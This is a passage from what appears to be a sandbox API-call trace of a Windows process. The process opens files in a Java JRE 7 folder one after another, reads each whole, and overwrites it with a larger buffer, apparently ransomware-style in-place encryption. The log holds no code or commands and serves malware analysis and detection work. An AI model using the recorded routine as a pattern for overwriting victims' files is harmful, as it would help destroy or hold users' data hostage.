ReleaseMutex (hMutex=0x168) returned 1 [0118.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightRegular.ttf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0118.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightRegular.ttf", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightRegular.ttf", lpUsedDefaultChar=0x0) returned 23 [0118.791] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.802] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5334c [0118.802] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.819] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5334c [0118.819] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.819] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0118.819] WriteFile (in: hFile=0x1d8, lpBuffer=0x289f9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f9a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.820] CloseHandle (hObject=0x1d8) returned 1 [0118.820] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.821] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.821] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa5 [0118.821] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.821] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.821] ReleaseMutex (hMutex=0x168) returned 1 [0118.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0118.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x1f88a64, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_CopyDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0118.821] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35f58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35f58*, lpNumberOfBytesRead=0x2b1f2bc*=0xa5, lpOverlapped=0x0) returned 1 [0118.822] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.822] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x62d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x62d, lpOverlapped=0x0) returned 1 [0118.823] CloseHandle (hObject=0x1d8) returned 1 [0118.823] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.824] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.824] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1aa8c [0118.824] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.824] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.824] ReleaseMutex (hMutex=0x168) returned 1 [0118.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jce.jar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0118.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jce.jar", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jce.jar", lpUsedDefaultChar=0x0) returned 7 [0118.825] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0118.828] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x19a8c [0118.828] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.896] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x19a8c [0118.896] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.897] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0118.898] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0118.898] CloseHandle (hObject=0x1d8) returned 1 [0118.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.900] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.900] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xf9e [0118.900] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.901] ReleaseMutex (hMutex=0x168) returned 1 [0118.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.access", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.access", cchWideChar=16, lpMultiByteStr=0x1f88a64, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jmxremote.access", lpUsedDefaultChar=0x0) returned 16 [0118.901] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xf9e, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xf9e, lpOverlapped=0x0) returned 1 [0118.920] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.920] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1526, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1526, lpOverlapped=0x0) returned 1 [0118.921] CloseHandle (hObject=0x1d8) returned 1 [0118.921] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.923] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.923] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xaec [0118.923] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.923] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.924] ReleaseMutex (hMutex=0x168) returned 1 [0118.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfont.properties.ja", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfont.properties.ja", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="psfont.properties.ja", lpUsedDefaultChar=0x0) returned 20 [0118.924] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xaec, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xaec, lpOverlapped=0x0) returned 1 [0118.928] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.928] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1074, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1074, lpOverlapped=0x0) returned 1 [0118.928] CloseHandle (hObject=0x1d8) returned 1 [0118.929] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.939] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.939] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x9e [0118.939] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.939] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.940] ReleaseMutex (hMutex=0x168) returned 1 [0118.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.policy", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.policy", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx.policy", lpUsedDefaultChar=0x0) returned 13 [0118.940] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b7fd8, nNumberOfBytesToRead=0x9e, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b7fd8*, lpNumberOfBytesRead=0x2b1f2bc*=0x9e, lpOverlapped=0x0) returned 1 [0118.941] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.941] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x626, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x626, lpOverlapped=0x0) returned 1 [0118.941] CloseHandle (hObject=0x1dc) returned 1 [0118.942] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.944] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.944] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41 [0118.945] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.945] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.945] ReleaseMutex (hMutex=0x168) returned 1 [0118.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Addis_Ababa", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Addis_Ababa", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Addis_Ababa", lpUsedDefaultChar=0x0) returned 11 [0118.945] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x41, lpOverlapped=0x0) returned 1 [0118.946] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.946] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0118.947] CloseHandle (hObject=0x1dc) returned 1 [0118.947] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.954] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.954] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41 [0118.954] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.954] ReleaseMutex (hMutex=0x168) returned 1 [0118.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brazzaville", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brazzaville", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Brazzaville", lpUsedDefaultChar=0x0) returned 11 [0118.955] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x41, lpOverlapped=0x0) returned 1 [0118.956] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.956] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0118.956] CloseHandle (hObject=0x1dc) returned 1 [0118.956] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.958] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.959] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41 [0118.959] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.959] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.959] ReleaseMutex (hMutex=0x168) returned 1 [0118.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Djibouti", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0118.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Djibouti", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Djibouti", lpUsedDefaultChar=0x0) returned 8 [0118.959] ReadFile (in: hFile=0x20c, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x41, lpOverlapped=0x0) returned 1 [0118.960] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.960] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0118.960] CloseHandle (hObject=0x20c) returned 1 [0118.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.962] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.962] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x61 [0118.962] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.962] ReleaseMutex (hMutex=0x168) returned 1 [0118.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kampala", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0118.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kampala", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kampala", lpUsedDefaultChar=0x0) returned 7 [0118.962] ReadFile (in: hFile=0x20c, lpBuffer=0x1f56c48, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56c48*, lpNumberOfBytesRead=0x2b1f2bc*=0x61, lpOverlapped=0x0) returned 1 [0118.964] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.964] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0118.964] CloseHandle (hObject=0x20c) returned 1 [0118.964] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.966] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.966] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0118.966] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: 